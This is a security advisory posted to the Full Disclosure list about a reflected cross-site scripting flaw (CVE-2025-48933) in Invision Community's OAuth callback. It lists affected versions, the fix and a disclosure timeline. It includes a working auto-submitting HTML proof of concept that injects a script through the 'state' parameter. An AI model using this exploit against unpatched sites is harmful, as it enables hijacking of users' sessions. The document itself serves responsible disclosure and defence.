-----------------------------------------------------------------------------------------
Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting Vulnerability
-----------------------------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

Certain 4.x versions before 4.7.21.
All 5.x versions before 5.0.8.

[-] Vulnerability Description:

User input passed through the "state" POST parameter to the /oauth/callback/index.php script is not properly sanitized before being used to generate HTML output. This can be exploited by attackers to perform Reflected Cross-Site Scripting (XSS) attacks.

[-] Proof of Concept:

The vulnerability can be exploited by tricking a victim user into opening an HTML page like the following:

<html>
<form method="POST">
<input type="hidden" name="state" />
</form>
<script>
var target = "https://invisioncommunity.com/forums/";
var form = document.forms[0];
form.action = target + "oauth/callback/index.php";
form.childNodes[1].value = '1-' + btoa(target) + '-2-"><script>alert("XSS on "+document.domain)<\/script>';
form.submit();
</script>
</html>

[-] Solution:

Upgrade to version 4.7.21, 5.0.8, or later.

[-] Disclosure Timeline:

[16/05/2025] - Vendor notified
[27/05/2025] - Version 4.7.21 released
[28/05/2025] - Version 5.0.8 released
[28/05/2025] - CVE identifier requested
[28/05/2025] - CVE identifier assigned
[23/07/2025] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-48933 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2025-05

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
